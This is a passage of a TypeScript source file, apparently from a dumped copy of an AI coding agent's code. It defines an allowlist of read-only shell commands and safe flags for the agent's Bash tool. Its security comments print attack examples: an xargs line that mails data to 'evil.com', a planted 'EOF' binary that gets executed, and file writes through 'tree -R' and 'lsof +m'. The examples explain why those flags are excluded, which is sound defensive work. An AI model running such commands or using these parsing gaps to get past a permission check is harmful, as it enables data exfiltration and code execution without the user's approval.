tools/BashTool/readOnlyValidation.ts at main · nonbinary.computer/claude-code

nonbinary.computer / claude-code
forked from oppi.li/claude-code
fork atom
source dump of claude code
fork atom
claude-code / tools / BashTool / readOnlyValidation.ts
at main 1990 lines 68 kB view raw
wrap content
oppi.li dump from zip 13d ago
63aada3f
   1import type { z } from 'zod/v4'
   2import { getOriginalCwd } from '../../bootstrap/state.js'
   3import {
   4  extractOutputRedirections,
   5  splitCommand_DEPRECATED,
   6} from '../../utils/bash/commands.js'
   7import { tryParseShellCommand } from '../../utils/bash/shellQuote.js'
   8import { getCwd } from '../../utils/cwd.js'
   9import { isCurrentDirectoryBareGitRepo } from '../../utils/git.js'
  10import type { PermissionResult } from '../../utils/permissions/PermissionResult.js'
  11import { getPlatform } from '../../utils/platform.js'
  12import { SandboxManager } from '../../utils/sandbox/sandbox-adapter.js'
  13import {
  14  containsVulnerableUncPath,
  15  DOCKER_READ_ONLY_COMMANDS,
  16  EXTERNAL_READONLY_COMMANDS,
  17  type FlagArgType,
  18  GH_READ_ONLY_COMMANDS,
  19  GIT_READ_ONLY_COMMANDS,
  20  PYRIGHT_READ_ONLY_COMMANDS,
  21  RIPGREP_READ_ONLY_COMMANDS,
  22  validateFlags,
  23} from '../../utils/shell/readOnlyCommandValidation.js'
  24import type { BashTool } from './BashTool.js'
  25import { isNormalizedGitCommand } from './bashPermissions.js'
  26import { bashCommandIsSafe_DEPRECATED } from './bashSecurity.js'
  27import {
  28  COMMAND_OPERATION_TYPE,
  29  PATH_EXTRACTORS,
  30  type PathCommand,
  31} from './pathValidation.js'
  32import { sedCommandIsAllowedByAllowlist } from './sedValidation.js'
  33
  34// Unified command validation configuration system
  35type CommandConfig = {
  36  // A Record mapping from the command (e.g. `xargs` or `git diff`) to its safe flags and the values they accept
  37  safeFlags: Record<string, FlagArgType>
  38  // An optional regex that is used for additional validation beyond flag parsing
  39  regex?: RegExp
  40  // An optional callback for additional custom validation logic. Returns true if the command is dangerous,
  41  // false if it appears to be safe. Meant to be used in conjunction with the safeFlags-based validation.
  42  additionalCommandIsDangerousCallback?: (
  43    rawCommand: string,
  44    args: string[],
  45  ) => boolean
  46  // When false, the tool does NOT respect POSIX `--` end-of-options.
  47  // validateFlags will continue checking flags after `--` instead of breaking.
  48  // Default: true (most tools respect `--`).
  49  respectsDoubleDash?: boolean
  50}
  51
  52// Shared safe flags for fd and fdfind (Debian/Ubuntu package name)
  53// SECURITY: -x/--exec and -X/--exec-batch are deliberately excluded —
  54// they execute arbitrary commands for each search result.
  55const FD_SAFE_FLAGS: Record<string, FlagArgType> = {
  56  '-h': 'none',
  57  '--help': 'none',
  58  '-V': 'none',
  59  '--version': 'none',
  60  '-H': 'none',
  61  '--hidden': 'none',
  62  '-I': 'none',
  63  '--no-ignore': 'none',
  64  '--no-ignore-vcs': 'none',
  65  '--no-ignore-parent': 'none',
  66  '-s': 'none',
  67  '--case-sensitive': 'none',
  68  '-i': 'none',
  69  '--ignore-case': 'none',
  70  '-g': 'none',
  71  '--glob': 'none',
  72  '--regex': 'none',
  73  '-F': 'none',
  74  '--fixed-strings': 'none',
  75  '-a': 'none',
  76  '--absolute-path': 'none',
  77  // SECURITY: -l/--list-details EXCLUDED — internally executes `ls` as subprocess (same
  78  // pathway as --exec-batch). PATH hijacking risk if malicious `ls` is on PATH.
  79  '-L': 'none',
  80  '--follow': 'none',
  81  '-p': 'none',
  82  '--full-path': 'none',
  83  '-0': 'none',
  84  '--print0': 'none',
  85  '-d': 'number',
  86  '--max-depth': 'number',
  87  '--min-depth': 'number',
  88  '--exact-depth': 'number',
  89  '-t': 'string',
  90  '--type': 'string',
  91  '-e': 'string',
  92  '--extension': 'string',
  93  '-S': 'string',
  94  '--size': 'string',
  95  '--changed-within': 'string',
  96  '--changed-before': 'string',
  97  '-o': 'string',
  98  '--owner': 'string',
  99  '-E': 'string',
 100  '--exclude': 'string',
 101  '--ignore-file': 'string',
 102  '-c': 'string',
 103  '--color': 'string',
 104  '-j': 'number',
 105  '--threads': 'number',
 106  '--max-buffer-time': 'string',
 107  '--max-results': 'number',
 108  '-1': 'none',
 109  '-q': 'none',
 110  '--quiet': 'none',
 111  '--show-errors': 'none',
 112  '--strip-cwd-prefix': 'none',
 113  '--one-file-system': 'none',
 114  '--prune': 'none',
 115  '--search-path': 'string',
 116  '--base-directory': 'string',
 117  '--path-separator': 'string',
 118  '--batch-size': 'number',
 119  '--no-require-git': 'none',
 120  '--hyperlink': 'string',
 121  '--and': 'string',
 122  '--format': 'string',
 123}
 124
 125// Central configuration for allowlist-based command validation
 126// All commands and flags here should only allow reading files. They should not
 127// allow writing to files, executing code, or creating network requests.
 128const COMMAND_ALLOWLIST: Record<string, CommandConfig> = {
 129  xargs: {
 130    safeFlags: {
 131      '-I': '{}',
 132      // SECURITY: `-i` and `-e` (lowercase) REMOVED — both use GNU getopt
 133      // optional-attached-arg semantics (`i::`, `e::`). The arg MUST be
 134      // attached (`-iX`, `-eX`); space-separated (`-i X`, `-e X`) means the
 135      // flag takes NO arg and `X` becomes the next positional (target command).
 136      //
 137      // `-i` (`i::` — optional replace-str):
 138      //   echo /usr/sbin/sendm | xargs -it tail a@evil.com
 139      //   validator: -it bundle (both 'none') OK, tail ∈ SAFE_TARGET → break
 140      //   GNU: -i replace-str=t, tail → /usr/sbin/sendmail → NETWORK EXFIL
 141      //
 142      // `-e` (`e::` — optional eof-str):
 143      //   cat data | xargs -e EOF echo foo
 144      //   validator: -e consumes 'EOF' as arg (type 'EOF'), echo ∈ SAFE_TARGET
 145      //   GNU: -e no attached arg → no eof-str, 'EOF' is the TARGET COMMAND
 146      //   → executes binary named EOF from PATH → CODE EXEC (malicious repo)
 147      //
 148      // Use uppercase `-I {}` (mandatory arg) and `-E EOF` (POSIX, mandatory
 149      // arg) instead — both validator and xargs agree on argument consumption.
 150      // `-i`/`-e` are deprecated (GNU: "use -I instead" / "use -E instead").
 151      '-n': 'number',
 152      '-P': 'number',
 153      '-L': 'number',
 154      '-s': 'number',
 155      '-E': 'EOF', // POSIX, MANDATORY separate arg — validator & xargs agree
 156      '-0': 'none',
 157      '-t': 'none',
 158      '-r': 'none',
 159      '-x': 'none',
 160      '-d': 'char',
 161    },
 162  },
 163  // All git read-only commands from shared validation map
 164  ...GIT_READ_ONLY_COMMANDS,
 165  file: {
 166    safeFlags: {
 167      // Output format flags
 168      '--brief': 'none',
 169      '-b': 'none',
 170      '--mime': 'none',
 171      '-i': 'none',
 172      '--mime-type': 'none',
 173      '--mime-encoding': 'none',
 174      '--apple': 'none',
 175      // Behavior flags
 176      '--check-encoding': 'none',
 177      '-c': 'none',
 178      '--exclude': 'string',
 179      '--exclude-quiet': 'string',
 180      '--print0': 'none',
 181      '-0': 'none',
 182      '-f': 'string',
 183      '-F': 'string',
 184      '--separator': 'string',
 185      '--help': 'none',
 186      '--version': 'none',
 187      '-v': 'none',
 188      // Following/dereferencing
 189      '--no-dereference': 'none',
 190      '-h': 'none',
 191      '--dereference': 'none',
 192      '-L': 'none',
 193      // Magic file options (safe when just reading)
 194      '--magic-file': 'string',
 195      '-m': 'string',
 196      // Other safe options
 197      '--keep-going': 'none',
 198      '-k': 'none',
 199      '--list': 'none',
 200      '-l': 'none',
 201      '--no-buffer': 'none',
 202      '-n': 'none',
 203      '--preserve-date': 'none',
 204      '-p': 'none',
 205      '--raw': 'none',
 206      '-r': 'none',
 207      '-s': 'none',
 208      '--special-files': 'none',
 209      // Uncompress flag for archives
 210      '--uncompress': 'none',
 211      '-z': 'none',
 212    },
 213  },
 214  sed: {
 215    safeFlags: {
 216      // Expression flags
 217      '--expression': 'string',
 218      '-e': 'string',
 219      // Output control
 220      '--quiet': 'none',
 221      '--silent': 'none',
 222      '-n': 'none',
 223      // Extended regex
 224      '--regexp-extended': 'none',
 225      '-r': 'none',
 226      '--posix': 'none',
 227      '-E': 'none',
 228      // Line handling
 229      '--line-length': 'number',
 230      '-l': 'number',
 231      '--zero-terminated': 'none',
 232      '-z': 'none',
 233      '--separate': 'none',
 234      '-s': 'none',
 235      '--unbuffered': 'none',
 236      '-u': 'none',
 237      // Debugging/help
 238      '--debug': 'none',
 239      '--help': 'none',
 240      '--version': 'none',
 241    },
 242    additionalCommandIsDangerousCallback: (
 243      rawCommand: string,
 244      _args: string[],
 245    ) => !sedCommandIsAllowedByAllowlist(rawCommand),
 246  },
 247  sort: {
 248    safeFlags: {
 249      // Sorting options
 250      '--ignore-leading-blanks': 'none',
 251      '-b': 'none',
 252      '--dictionary-order': 'none',
 253      '-d': 'none',
 254      '--ignore-case': 'none',
 255      '-f': 'none',
 256      '--general-numeric-sort': 'none',
 257      '-g': 'none',
 258      '--human-numeric-sort': 'none',
 259      '-h': 'none',
 260      '--ignore-nonprinting': 'none',
 261      '-i': 'none',
 262      '--month-sort': 'none',
 263      '-M': 'none',
 264      '--numeric-sort': 'none',
 265      '-n': 'none',
 266      '--random-sort': 'none',
 267      '-R': 'none',
 268      '--reverse': 'none',
 269      '-r': 'none',
 270      '--sort': 'string',
 271      '--stable': 'none',
 272      '-s': 'none',
 273      '--unique': 'none',
 274      '-u': 'none',
 275      '--version-sort': 'none',
 276      '-V': 'none',
 277      '--zero-terminated': 'none',
 278      '-z': 'none',
 279      // Key specifications
 280      '--key': 'string',
 281      '-k': 'string',
 282      '--field-separator': 'string',
 283      '-t': 'string',
 284      // Checking
 285      '--check': 'none',
 286      '-c': 'none',
 287      '--check-char-order': 'none',
 288      '-C': 'none',
 289      // Merging
 290      '--merge': 'none',
 291      '-m': 'none',
 292      // Buffer size
 293      '--buffer-size': 'string',
 294      '-S': 'string',
 295      // Parallel processing
 296      '--parallel': 'number',
 297      // Batch size
 298      '--batch-size': 'number',
 299      // Help and version
 300      '--help': 'none',
 301      '--version': 'none',
 302    },
 303  },
 304  man: {
 305    safeFlags: {
 306      // Safe display options
 307      '-a': 'none', // Display all manual pages
 308      '--all': 'none', // Same as -a
 309      '-d': 'none', // Debug mode
 310      '-f': 'none', // Emulate whatis
 311      '--whatis': 'none', // Same as -f
 312      '-h': 'none', // Help
 313      '-k': 'none', // Emulate apropos
 314      '--apropos': 'none', // Same as -k
 315      '-l': 'string', // Local file (safe for reading, Linux only)
 316      '-w': 'none', // Display location instead of content
 317
 318      // Safe formatting options
 319      '-S': 'string', // Restrict manual sections
 320      '-s': 'string', // Same as -S for whatis/apropos mode
 321    },
 322  },
 323  // help command - only allow bash builtin help flags to prevent attacks when
 324  // help is aliased to man (e.g., in oh-my-zsh common-aliases plugin).
 325  // man's -P flag allows arbitrary command execution via pager.
 326  help: {
 327    safeFlags: {
 328      '-d': 'none', // Output short description for each topic
 329      '-m': 'none', // Display usage in pseudo-manpage format
 330      '-s': 'none', // Output only a short usage synopsis
 331    },
 332  },
 333  netstat: {
 334    safeFlags: {
 335      // Safe display options
 336      '-a': 'none', // Show all sockets
 337      '-L': 'none', // Show listen queue sizes
 338      '-l': 'none', // Print full IPv6 address
 339      '-n': 'none', // Show network addresses as numbers
 340
 341      // Safe filtering options
 342      '-f': 'string', // Address family (inet, inet6, unix, vsock)
 343
 344      // Safe interface options
 345      '-g': 'none', // Show multicast group membership
 346      '-i': 'none', // Show interface state
 347      '-I': 'string', // Specific interface
 348
 349      // Safe statistics options
 350      '-s': 'none', // Show per-protocol statistics
 351
 352      // Safe routing options
 353      '-r': 'none', // Show routing tables
 354
 355      // Safe mbuf options
 356      '-m': 'none', // Show memory management statistics
 357
 358      // Safe other options
 359      '-v': 'none', // Increase verbosity
 360    },
 361  },
 362  ps: {
 363    safeFlags: {
 364      // UNIX-style process selection (these are safe)
 365      '-e': 'none', // Select all processes
 366      '-A': 'none', // Select all processes (same as -e)
 367      '-a': 'none', // Select all with tty except session leaders
 368      '-d': 'none', // Select all except session leaders
 369      '-N': 'none', // Negate selection
 370      '--deselect': 'none',
 371
 372      // UNIX-style output format (safe, doesn't show env)
 373      '-f': 'none', // Full format
 374      '-F': 'none', // Extra full format
 375      '-l': 'none', // Long format
 376      '-j': 'none', // Jobs format
 377      '-y': 'none', // Don't show flags
 378
 379      // Output modifiers (safe ones)
 380      '-w': 'none', // Wide output
 381      '-ww': 'none', // Unlimited width
 382      '--width': 'number',
 383      '-c': 'none', // Show scheduler info
 384      '-H': 'none', // Show process hierarchy
 385      '--forest': 'none',
 386      '--headers': 'none',
 387      '--no-headers': 'none',
 388      '-n': 'string', // Set namelist file
 389      '--sort': 'string',
 390
 391      // Thread display
 392      '-L': 'none', // Show threads
 393      '-T': 'none', // Show threads
 394      '-m': 'none', // Show threads after processes
 395
 396      // Process selection by criteria
 397      '-C': 'string', // By command name
 398      '-G': 'string', // By real group ID
 399      '-g': 'string', // By session or effective group
 400      '-p': 'string', // By PID
 401      '--pid': 'string',
 402      '-q': 'string', // Quick mode by PID
 403      '--quick-pid': 'string',
 404      '-s': 'string', // By session ID
 405      '--sid': 'string',
 406      '-t': 'string', // By tty
 407      '--tty': 'string',
 408      '-U': 'string', // By real user ID
 409      '-u': 'string', // By effective user ID
 410      '--user': 'string',
 411
 412      // Help/version
 413      '--help': 'none',
 414      '--info': 'none',
 415      '-V': 'none',
 416      '--version': 'none',
 417    },
 418    // Block BSD-style 'e' modifier which shows environment variables
 419    // BSD options are letter-only tokens without a leading dash
 420    additionalCommandIsDangerousCallback: (
 421      _rawCommand: string,
 422      args: string[],
 423    ) => {
 424      // Check for BSD-style 'e' in letter-only tokens (not -e which is UNIX-style)
 425      // A BSD-style option is a token of only letters (no leading dash) containing 'e'
 426      return args.some(
 427        a => !a.startsWith('-') && /^[a-zA-Z]*e[a-zA-Z]*$/.test(a),
 428      )
 429    },
 430  },
 431  base64: {
 432    respectsDoubleDash: false, // macOS base64 does not respect POSIX --
 433    safeFlags: {
 434      // Safe decode options
 435      '-d': 'none', // Decode
 436      '-D': 'none', // Decode (macOS)
 437      '--decode': 'none', // Decode
 438
 439      // Safe formatting options
 440      '-b': 'number', // Break lines at num (macOS)
 441      '--break': 'number', // Break lines at num (macOS)
 442      '-w': 'number', // Wrap lines at COLS (Linux)
 443      '--wrap': 'number', // Wrap lines at COLS (Linux)
 444
 445      // Safe input options (read from file, not write)
 446      '-i': 'string', // Input file (safe for reading)
 447      '--input': 'string', // Input file (safe for reading)
 448
 449      // Safe misc options
 450      '--ignore-garbage': 'none', // Ignore non-alphabet chars when decoding (Linux)
 451      '-h': 'none', // Help
 452      '--help': 'none', // Help
 453      '--version': 'none', // Version
 454    },
 455  },
 456  grep: {
 457    safeFlags: {
 458      // Pattern flags
 459      '-e': 'string', // Pattern
 460      '--regexp': 'string',
 461      '-f': 'string', // File with patterns
 462      '--file': 'string',
 463      '-F': 'none', // Fixed strings
 464      '--fixed-strings': 'none',
 465      '-G': 'none', // Basic regexp (default)
 466      '--basic-regexp': 'none',
 467      '-E': 'none', // Extended regexp
 468      '--extended-regexp': 'none',
 469      '-P': 'none', // Perl regexp
 470      '--perl-regexp': 'none',
 471
 472      // Matching control
 473      '-i': 'none', // Ignore case
 474      '--ignore-case': 'none',
 475      '--no-ignore-case': 'none',
 476      '-v': 'none', // Invert match
 477      '--invert-match': 'none',
 478      '-w': 'none', // Word regexp
 479      '--word-regexp': 'none',
 480      '-x': 'none', // Line regexp
 481      '--line-regexp': 'none',
 482
 483      // Output control
 484      '-c': 'none', // Count
 485      '--count': 'none',
 486      '--color': 'string',
 487      '--colour': 'string',
 488      '-L': 'none', // Files without match
 489      '--files-without-match': 'none',
 490      '-l': 'none', // Files with matches
 491      '--files-with-matches': 'none',
 492      '-m': 'number', // Max count
 493      '--max-count': 'number',
 494      '-o': 'none', // Only matching
 495      '--only-matching': 'none',
 496      '-q': 'none', // Quiet
 497      '--quiet': 'none',
 498      '--silent': 'none',
 499      '-s': 'none', // No messages
 500      '--no-messages': 'none',
 501
 502      // Output line prefix
 503      '-b': 'none', // Byte offset
 504      '--byte-offset': 'none',
 505      '-H': 'none', // With filename
 506      '--with-filename': 'none',
 507      '-h': 'none', // No filename
 508      '--no-filename': 'none',
 509      '--label': 'string',
 510      '-n': 'none', // Line number
 511      '--line-number': 'none',
 512      '-T': 'none', // Initial tab
 513      '--initial-tab': 'none',
 514      '-u': 'none', // Unix byte offsets
 515      '--unix-byte-offsets': 'none',
 516      '-Z': 'none', // Null after filename
 517      '--null': 'none',
 518      '-z': 'none', // Null data
 519      '--null-data': 'none',
 520
 521      // Context control
 522      '-A': 'number', // After context
 523      '--after-context': 'number',
 524      '-B': 'number', // Before context
 525      '--before-context': 'number',
 526      '-C': 'number', // Context
 527      '--context': 'number',
 528      '--group-separator': 'string',
 529      '--no-group-separator': 'none',
 530
 531      // File and directory selection
 532      '-a': 'none', // Text (process binary as text)
 533      '--text': 'none',
 534      '--binary-files': 'string',
 535      '-D': 'string', // Devices
 536      '--devices': 'string',
 537      '-d': 'string', // Directories
 538      '--directories': 'string',
 539      '--exclude': 'string',
 540      '--exclude-from': 'string',
 541      '--exclude-dir': 'string',
 542      '--include': 'string',
 543      '-r': 'none', // Recursive
 544      '--recursive': 'none',
 545      '-R': 'none', // Dereference-recursive
 546      '--dereference-recursive': 'none',
 547
 548      // Other options
 549      '--line-buffered': 'none',
 550      '-U': 'none', // Binary
 551      '--binary': 'none',
 552
 553      // Help and version
 554      '--help': 'none',
 555      '-V': 'none',
 556      '--version': 'none',
 557    },
 558  },
 559  ...RIPGREP_READ_ONLY_COMMANDS,
 560  // Checksum commands - these only read files and compute/verify hashes
 561  // All flags are safe as they only affect output format or verification behavior
 562  sha256sum: {
 563    safeFlags: {
 564      // Mode flags
 565      '-b': 'none', // Binary mode
 566      '--binary': 'none',
 567      '-t': 'none', // Text mode
 568      '--text': 'none',
 569
 570      // Check/verify flags
 571      '-c': 'none', // Verify checksums from file
 572      '--check': 'none',
 573      '--ignore-missing': 'none', // Ignore missing files during check
 574      '--quiet': 'none', // Quiet mode during check
 575      '--status': 'none', // Don't output, exit code shows success
 576      '--strict': 'none', // Exit non-zero for improperly formatted lines
 577      '-w': 'none', // Warn about improperly formatted lines
 578      '--warn': 'none',
 579
 580      // Output format flags
 581      '--tag': 'none', // BSD-style output
 582      '-z': 'none', // End output lines with NUL
 583      '--zero': 'none',
 584
 585      // Help and version
 586      '--help': 'none',
 587      '--version': 'none',
 588    },
 589  },
 590  sha1sum: {
 591    safeFlags: {
 592      // Mode flags
 593      '-b': 'none', // Binary mode
 594      '--binary': 'none',
 595      '-t': 'none', // Text mode
 596      '--text': 'none',
 597
 598      // Check/verify flags
 599      '-c': 'none', // Verify checksums from file
 600      '--check': 'none',
 601      '--ignore-missing': 'none', // Ignore missing files during check
 602      '--quiet': 'none', // Quiet mode during check
 603      '--status': 'none', // Don't output, exit code shows success
 604      '--strict': 'none', // Exit non-zero for improperly formatted lines
 605      '-w': 'none', // Warn about improperly formatted lines
 606      '--warn': 'none',
 607
 608      // Output format flags
 609      '--tag': 'none', // BSD-style output
 610      '-z': 'none', // End output lines with NUL
 611      '--zero': 'none',
 612
 613      // Help and version
 614      '--help': 'none',
 615      '--version': 'none',
 616    },
 617  },
 618  md5sum: {
 619    safeFlags: {
 620      // Mode flags
 621      '-b': 'none', // Binary mode
 622      '--binary': 'none',
 623      '-t': 'none', // Text mode
 624      '--text': 'none',
 625
 626      // Check/verify flags
 627      '-c': 'none', // Verify checksums from file
 628      '--check': 'none',
 629      '--ignore-missing': 'none', // Ignore missing files during check
 630      '--quiet': 'none', // Quiet mode during check
 631      '--status': 'none', // Don't output, exit code shows success
 632      '--strict': 'none', // Exit non-zero for improperly formatted lines
 633      '-w': 'none', // Warn about improperly formatted lines
 634      '--warn': 'none',
 635
 636      // Output format flags
 637      '--tag': 'none', // BSD-style output
 638      '-z': 'none', // End output lines with NUL
 639      '--zero': 'none',
 640
 641      // Help and version
 642      '--help': 'none',
 643      '--version': 'none',
 644    },
 645  },
 646  // tree command - moved from READONLY_COMMAND_REGEXES to allow flags and path arguments
 647  // -o/--output writes to a file, so it's excluded. All other flags are display/filter options.
 648  tree: {
 649    safeFlags: {
 650      // Listing options
 651      '-a': 'none', // All files
 652      '-d': 'none', // Directories only
 653      '-l': 'none', // Follow symlinks
 654      '-f': 'none', // Full path prefix
 655      '-x': 'none', // Stay on current filesystem
 656      '-L': 'number', // Max depth
 657      // SECURITY: -R REMOVED. tree -R combined with -H (HTML mode) and -L (depth)
 658      // WRITES 00Tree.html files to every subdirectory at the depth boundary.
 659      // From man tree (< 2.1.0): "-R — at each of them execute tree again
 660      // adding `-o 00Tree.html` as a new option." The comment "Rerun at max
 661      // depth" was misleading — the "rerun" includes a hardcoded -o file write.
 662      // `tree -R -H . -L 2 /path` → writes /path/<subdir>/00Tree.html for each
 663      // subdir at depth 2. FILE WRITE, zero permissions.
 664      '-P': 'string', // Include pattern
 665      '-I': 'string', // Exclude pattern
 666      '--gitignore': 'none',
 667      '--gitfile': 'string',
 668      '--ignore-case': 'none',
 669      '--matchdirs': 'none',
 670      '--metafirst': 'none',
 671      '--prune': 'none',
 672      '--info': 'none',
 673      '--infofile': 'string',
 674      '--noreport': 'none',
 675      '--charset': 'string',
 676      '--filelimit': 'number',
 677      // File display options
 678      '-q': 'none', // Non-printable as ?
 679      '-N': 'none', // Non-printable as-is
 680      '-Q': 'none', // Quote filenames
 681      '-p': 'none', // Protections
 682      '-u': 'none', // Owner
 683      '-g': 'none', // Group
 684      '-s': 'none', // Size bytes
 685      '-h': 'none', // Human-readable sizes
 686      '--si': 'none',
 687      '--du': 'none',
 688      '-D': 'none', // Last modification time
 689      '--timefmt': 'string',
 690      '-F': 'none', // Append indicator
 691      '--inodes': 'none',
 692      '--device': 'none',
 693      // Sorting options
 694      '-v': 'none', // Version sort
 695      '-t': 'none', // Sort by mtime
 696      '-c': 'none', // Sort by ctime
 697      '-U': 'none', // Unsorted
 698      '-r': 'none', // Reverse sort
 699      '--dirsfirst': 'none',
 700      '--filesfirst': 'none',
 701      '--sort': 'string',
 702      // Graphics/output options
 703      '-i': 'none', // No indentation lines
 704      '-A': 'none', // ANSI line graphics
 705      '-S': 'none', // CP437 line graphics
 706      '-n': 'none', // No color
 707      '-C': 'none', // Color
 708      '-X': 'none', // XML output
 709      '-J': 'none', // JSON output
 710      '-H': 'string', // HTML output with base HREF
 711      '--nolinks': 'none',
 712      '--hintro': 'string',
 713      '--houtro': 'string',
 714      '-T': 'string', // HTML title
 715      '--hyperlink': 'none',
 716      '--scheme': 'string',
 717      '--authority': 'string',
 718      // Input options (read from file, not write)
 719      '--fromfile': 'none',
 720      '--fromtabfile': 'none',
 721      '--fflinks': 'none',
 722      // Help and version
 723      '--help': 'none',
 724      '--version': 'none',
 725    },
 726  },
 727  // date command - moved from READONLY_COMMANDS because -s/--set can set system time
 728  // Also -f/--file can be used to read dates from file and set time
 729  // We only allow safe display options
 730  date: {
 731    safeFlags: {
 732      // Display options (safe - don't modify system time)
 733      '-d': 'string', // --date=STRING - display time described by STRING
 734      '--date': 'string',
 735      '-r': 'string', // --reference=FILE - display file's modification time
 736      '--reference': 'string',
 737      '-u': 'none', // --utc - use UTC
 738      '--utc': 'none',
 739      '--universal': 'none',
 740      // Output format options
 741      '-I': 'none', // --iso-8601 (can have optional argument, but none type handles bare flag)
 742      '--iso-8601': 'string',
 743      '-R': 'none', // --rfc-email
 744      '--rfc-email': 'none',
 745      '--rfc-3339': 'string',
 746      // Debug/help
 747      '--debug': 'none',
 748      '--help': 'none',
 749      '--version': 'none',
 750    },
 751    // Dangerous flags NOT included (blocked by omission):
 752    // -s / --set - sets system time
 753    // -f / --file - reads dates from file (can be used to set time in batch)
 754    // CRITICAL: date positional args in format MMDDhhmm[[CC]YY][.ss] set system time
 755    // Use callback to verify positional args start with + (format strings like +"%Y-%m-%d")
 756    additionalCommandIsDangerousCallback: (
 757      _rawCommand: string,
 758      args: string[],
 759    ) => {
 760      // args are already parsed tokens after "date"
 761      // Flags that require an argument
 762      const flagsWithArgs = new Set([
 763        '-d',
 764        '--date',
 765        '-r',
 766        '--reference',
 767        '--iso-8601',
 768        '--rfc-3339',
 769      ])
 770      let i = 0
 771      while (i < args.length) {
 772        const token = args[i]!
 773        // Skip flags and their arguments
 774        if (token.startsWith('--') && token.includes('=')) {
 775          // Long flag with =value, already consumed
 776          i++
 777        } else if (token.startsWith('-')) {
 778          // Flag - check if it takes an argument
 779          if (flagsWithArgs.has(token)) {
 780            i += 2 // Skip flag and its argument
 781          } else {
 782            i++ // Just skip the flag
 783          }
 784        } else {
 785          // Positional argument - must start with + for format strings
 786          // Anything else (like MMDDhhmm) could set system time
 787          if (!token.startsWith('+')) {
 788            return true // Dangerous
 789          }
 790          i++
 791        }
 792      }
 793      return false // Safe
 794    },
 795  },
 796  // hostname command - moved from READONLY_COMMANDS because positional args set hostname
 797  // Also -F/--file sets hostname from file, -b/--boot sets default hostname
 798  // We only allow safe display options and BLOCK any positional arguments
 799  hostname: {
 800    safeFlags: {
 801      // Display options only (safe)
 802      '-f': 'none', // --fqdn - display FQDN
 803      '--fqdn': 'none',
 804      '--long': 'none',
 805      '-s': 'none', // --short - display short name
 806      '--short': 'none',
 807      '-i': 'none', // --ip-address
 808      '--ip-address': 'none',
 809      '-I': 'none', // --all-ip-addresses
 810      '--all-ip-addresses': 'none',
 811      '-a': 'none', // --alias
 812      '--alias': 'none',
 813      '-d': 'none', // --domain
 814      '--domain': 'none',
 815      '-A': 'none', // --all-fqdns
 816      '--all-fqdns': 'none',
 817      '-v': 'none', // --verbose
 818      '--verbose': 'none',
 819      '-h': 'none', // --help
 820      '--help': 'none',
 821      '-V': 'none', // --version
 822      '--version': 'none',
 823    },
 824    // CRITICAL: Block any positional arguments - they set the hostname
 825    // Also block -F/--file, -b/--boot, -y/--yp/--nis (not in safeFlags = blocked)
 826    // Use regex to ensure no positional args after flags
 827    regex: /^hostname(?:\s+(?:-[a-zA-Z]|--[a-zA-Z-]+))*\s*$/,
 828  },
 829  // info command - moved from READONLY_COMMANDS because -o/--output writes to files
 830  // Also --dribble writes keystrokes to file, --init-file loads custom config
 831  // We only allow safe display/navigation options
 832  info: {
 833    safeFlags: {
 834      // Navigation/display options (safe)
 835      '-f': 'string', // --file - specify manual file to read
 836      '--file': 'string',
 837      '-d': 'string', // --directory - search path
 838      '--directory': 'string',
 839      '-n': 'string', // --node - specify node
 840      '--node': 'string',
 841      '-a': 'none', // --all
 842      '--all': 'none',
 843      '-k': 'string', // --apropos - search
 844      '--apropos': 'string',
 845      '-w': 'none', // --where - show location
 846      '--where': 'none',
 847      '--location': 'none',
 848      '--show-options': 'none',
 849      '--vi-keys': 'none',
 850      '--subnodes': 'none',
 851      '-h': 'none',
 852      '--help': 'none',
 853      '--usage': 'none',
 854      '--version': 'none',
 855    },
 856    // Dangerous flags NOT included (blocked by omission):
 857    // -o / --output - writes output to file
 858    // --dribble - records keystrokes to file
 859    // --init-file - loads custom config (potential code execution)
 860    // --restore - replays keystrokes from file
 861  },
 862
 863  lsof: {
 864    safeFlags: {
 865      '-?': 'none',
 866      '-h': 'none',
 867      '-v': 'none',
 868      '-a': 'none',
 869      '-b': 'none',
 870      '-C': 'none',
 871      '-l': 'none',
 872      '-n': 'none',
 873      '-N': 'none',
 874      '-O': 'none',
 875      '-P': 'none',
 876      '-Q': 'none',
 877      '-R': 'none',
 878      '-t': 'none',
 879      '-U': 'none',
 880      '-V': 'none',
 881      '-X': 'none',
 882      '-H': 'none',
 883      '-E': 'none',
 884      '-F': 'none',
 885      '-g': 'none',
 886      '-i': 'none',
 887      '-K': 'none',
 888      '-L': 'none',
 889      '-o': 'none',
 890      '-r': 'none',
 891      '-s': 'none',
 892      '-S': 'none',
 893      '-T': 'none',
 894      '-x': 'none',
 895      '-A': 'string',
 896      '-c': 'string',
 897      '-d': 'string',
 898      '-e': 'string',
 899      '-k': 'string',
 900      '-p': 'string',
 901      '-u': 'string',
 902      // OMITTED (writes to disk): -D (device cache file build/update)
 903    },
 904    // Block +m (create mount supplement file) — writes to disk.
 905    // +prefix flags are treated as positional args by validateFlags,
 906    // so we must catch them here. lsof accepts +m<path> (attached path, no space)
 907    // with both absolute (+m/tmp/evil) and relative (+mfoo, +m.evil) paths.
 908    additionalCommandIsDangerousCallback: (_rawCommand, args) =>
 909      args.some(a => a === '+m' || a.startsWith('+m')),
 910  },
 911
 912  pgrep: {
 913    safeFlags: {
 914      '-d': 'string',
 915      '--delimiter': 'string',
 916      '-l': 'none',
 917      '--list-name': 'none',
 918      '-a': 'none',
 919      '--list-full': 'none',
 920      '-v': 'none',
 921      '--inverse': 'none',
 922      '-w': 'none',
 923      '--lightweight': 'none',
 924      '-c': 'none',
 925      '--count': 'none',
 926      '-f': 'none',
 927      '--full': 'none',
 928      '-g': 'string',
 929      '--pgroup': 'string',
 930      '-G': 'string',
 931      '--group': 'string',
 932      '-i': 'none',
 933      '--ignore-case': 'none',
 934      '-n': 'none',
 935      '--newest': 'none',
 936      '-o': 'none',
 937      '--oldest': 'none',
 938      '-O': 'string',
 939      '--older': 'string',
 940      '-P': 'string',
 941      '--parent': 'string',
 942      '-s': 'string',
 943      '--session': 'string',
 944      '-t': 'string',
 945      '--terminal': 'string',
 946      '-u': 'string',
 947      '--euid': 'string',
 948      '-U': 'string',
 949      '--uid': 'string',
 950      '-x': 'none',
 951      '--exact': 'none',
 952      '-F': 'string',
 953      '--pidfile': 'string',
 954      '-L': 'none',
 955      '--logpidfile': 'none',
 956      '-r': 'string',
 957      '--runstates': 'string',
 958      '--ns': 'string',
 959      '--nslist': 'string',
 960      '--help': 'none',
 961      '-V': 'none',
 962      '--version': 'none',
 963    },
 964  },
 965
 966  tput: {
 967    safeFlags: {
 968      '-T': 'string',
 969      '-V': 'none',
